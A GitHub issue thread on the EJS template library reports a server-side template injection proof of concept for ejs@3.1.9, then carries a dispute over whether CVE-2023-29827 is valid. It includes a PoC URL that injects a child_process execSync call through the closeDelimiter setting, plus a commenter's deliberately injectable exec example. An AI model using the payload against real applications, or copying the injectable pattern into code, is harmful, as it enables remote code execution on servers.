Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

EJS, Server side template injection ejs@3.1.9 Latest #720

Closed
pperk opened this issue Mar 13, 2023 · 10 comments
Closed

EJS, Server side template injection ejs@3.1.9 Latest #720

pperk opened this issue Mar 13, 2023 · 10 comments

Comments

@pperk
Copy link

pperk commented Mar 13, 2023

If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter.It can easily bypass the fix for CVE-2022-29078 in version 3.1.7.
15ee698
index.js

const express = require('express')
const app = express()
const port = 3000

app.set('view engine', 'ejs');

app.get('/page', (req,res) => {
    res.render('page', req.query);
})

app.listen(port, () => {
  console.log("Example app listening on port ${port}")
})

page.ejs

%%1");process.mainModule.require('child_process').execSync('calc');//

package.json

{
  "dependencies": {
    "ejs": "^3.1.9",
    "express": "^4.18.2"
  }
}

The poc looks like this:

http://127.0.0.1:3000/page?settings[view%20options][closeDelimiter]=1")%3bprocess.mainModule.require('child_process').execSync('calc')%3b//

Come to this branch option to realize code splicing execution.

ejs/lib/ejs.js

Line 844 in aed0124

this.source += ' ; __append("' + line.replace(d + d + c, d + c) + '")' + '\n';

image

@pperk pperk closed this as completed Mar 14, 2023
@carnil
Copy link

carnil commented May 5, 2023

@pperk this issue was closed shortly after the initial report without comment, can you shed details, was this a false report?

I noticed that there was apparently a CVE assigned for this issue, CVE-2023-29827

@rohit-dreamup
Copy link

Is there any plan to fix this issue . Its affecting us also !!

@mde
Copy link
Owner

mde commented May 9, 2023

This is clearly addressed in the SECURITY.md for the project: https://github.com/mde/ejs/blob/main/SECURITY.md#out-of-scope-vulnerabilities

In short, don't ever, ever give unfiltered access to EJS's render function. Always, always check your inputs.

@nitinac
Copy link

nitinac commented May 9, 2023

ejs@3.1.9 version is showing high severity by Mend scan for React JS application. Please suggest how to get rid of this issue since 3.1.9 is the latest version available in NPM.

image

@mde
Copy link
Owner

mde commented May 9, 2023

I do not control any of these supposed vulnerability databases. I have sent an email to NVD. I have sent an issue to GH. Please feel free to contact those entities as well, regarding this issue.

@lebbe
Copy link

lebbe commented May 11, 2023

With this approach of detecting vulnerabilities, everything becomes vulnerable, I mean...

index.js

const express = require("express");
const { exec } = require("node:child_process");

const app = express();
const port = 3000;

app.get("/page", async (req, res) => {
  exec(`echo ${req.query.script} | python`);
  res.send("?script is fed to python, please don't hack me.");
});

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`);
});

everyone, please remove python from your computers.

@sonu-jmh
Copy link

any idea on when we can expect a fix for this CVE ?

@mde
Copy link
Owner

mde commented May 11, 2023

Please read the thread. It's not a vulnerability, and I have no control of the databases. Please contact GitHub and NVD about this.

@meganwalker-ibm
Copy link

As an FYI @mde It looks like the organisation that assigned the CVE Number is MITRE themselves - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29827

So I think you might need to contact MITRE directly through https://cveform.mitre.org/ and requesting a Rejection of the CVE, as they are the ones who can invalidate it. Github and NVD are just feeding this CVE through from MITRE.

@stali1234
Copy link

image

The latest EJS report indicates that the Blackduck scan has been provided, but it states that the issue still persists.

@mde

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

9 participants